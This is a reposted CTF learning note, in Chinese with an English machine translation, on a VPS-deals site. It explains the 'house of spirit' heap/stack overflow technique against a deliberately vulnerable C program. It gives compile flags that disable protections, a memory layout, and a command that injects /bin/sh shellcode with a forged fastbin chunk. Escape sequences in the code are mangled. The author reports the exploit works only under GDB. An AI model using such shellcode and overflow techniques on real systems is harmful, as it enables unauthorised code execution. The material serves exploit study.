主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情! |
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作 |
学习了一下L-CTF中介绍的一个栈溢出利用技巧,记录一下。
样例代码如下:
/*
* blackngel's vulnerable program slightly modified by gb_master
*/
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
编译命令如下:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
Ubuntu 14 Server里编译需要安装一下开发包,否则会报错sys/cdefs.h文件找不到:
sudo apt-get install libc6-dev-i386
这里关键思路是:通过溢出修改局部变量的地址为栈中的一个地址,将伪造地址中的size字段设置成一个fastbin的有效大小,以便能成功将其free,后面的malloc将把此块内存重新申请并使用,snprintf函数再向其中写入数据,从而可以覆盖函数返回地址,最终getshell。
局部变量的内存分布如下:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
样例测试命令如下:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
这里有点问题,通过GDB调试可以getshell,直接执行则报段错误:
Learn a stack overflow utilization technique introduced in l-ctf and record it.
The sle code is as follows:
/ *
* blackngel's vulnerable program slightly modified by gb_master
* /
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
The compile command is as follows:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
To compile in Ubuntu 14 server, you need to install the following development package. Otherwise, an error will be reported. The sys / cdefs. H file cannot be found:
sudo apt-get install libc6-dev-i386
The key idea here is: change the address of local variable to an address in the stack through overflow, set the size field in the forged address to an effective size of fastbin, so that it can be free successfully, and malloc will reapply and use this block of memory, and snprintf function will write data to it, so that the return address of the function can be overwritten, and finally get shell.
The memory distribution of local variables is as follows:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
The sle test command is as follows:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
There is a problem here. You can get the shell through GDB debugging. If you execute directly, a segment error will be reported:
--------------------------------------------------------------
主机参考,收集国内外VPS,VPS测评,主机测评,云服务器,虚拟主机,独立服务器,国内外服务器,高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台
这几篇文章你可能也喜欢:
- 莱卡云九月优惠:4核云服务器每月39.9元起,浙江、镇江、美国、香港、韩国可用
- ecs安装php环境的方法(eclipse安装php开发环境)
- Linux系统如何安装图形化桌面?云服务器 ECS Linux系统安装图形化桌面的方法
- 阿里云ECS镜像如何搭建WordPress网站?搭建WordPress网站的全步骤
- ZJI,双十二特价优惠活动,香港免备案独立服务器5.5折,阿里云CN2专线,双线双IP,E5-2630L(6核12线程)处理器16G内存5Mbps CN2+BGP带宽,412.5元/月
本文由主机参考刊发,转载请注明:【溢出利用技巧】house of spirit friendly stack overflow https://zhujicankao.com/12459.html
评论前必须登录!
注册